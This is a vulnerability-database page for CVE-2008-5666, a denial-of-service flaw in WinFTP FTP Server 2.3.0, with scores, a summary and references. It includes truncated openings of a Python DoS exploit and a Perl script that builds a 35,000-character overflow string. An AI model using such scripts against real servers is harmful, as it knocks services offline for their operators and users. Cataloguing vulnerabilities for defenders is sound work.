Published: 19/12/2008 Updated: 29/09/2017

CVSS v2 Base Score: 3.5 | Impact Score: 2.9 | Exploitability Score: 6.8

VMScore: 360

Vector: AV:N/AC:M/Au:S/C:N/I:N/A:P

WinFTP FTP Server 2.3.0, when passive (aka PASV) mode is used, allows remote authenticated users to cause a denial of service via a sequence of FTP sessions that include an invalid "NLST -1" command.

Vulnerable Product	Search on Vulmon	Subscribe to Product
wftpserver winftp ftp server 2.3.0

# WinFTP v230 DoS exploit # WinFTP URL - wwwwftpservercom/ # DoS'ed when try to send data # (x)dmnt # -*- coding: windows-1252 -*- import socket import time import sys PORT = 21 def help_info(): print ("Usage: winftp <host> <login> <password>\n") print ("Note: anonymous is enought\n") def conn(hostname, user ...

#!/usr/bin/perl ############ # # Simple Dos Crap for the winftpsrvexe v230 # by Julien Bedard # #################################### use Net::FTP; $wftpsrvaddr = "255255255255"; $overflow = "?" x 35000; $user = "test"; $pass = "test"; $port = 21; $ftp = Net::FTP->new("$wftpsrvaddr", Debug => 0) || die "Cannot connect to ftp server ...

CWE-399 http://secunia.com/advisories/32209 http://www.securitytracker.com/id?1021040 http://securityreason.com/securityalert/4785 http://www.vupen.com/english/advisories/2008/2801 https://exchange.xforce.ibmcloud.com/vulnerabilities/45806 https://www.exploit-db.com/exploits/6717 https://nvd.nist.gov https://www.exploit-db.com/exploits/6717/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2008-5666

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect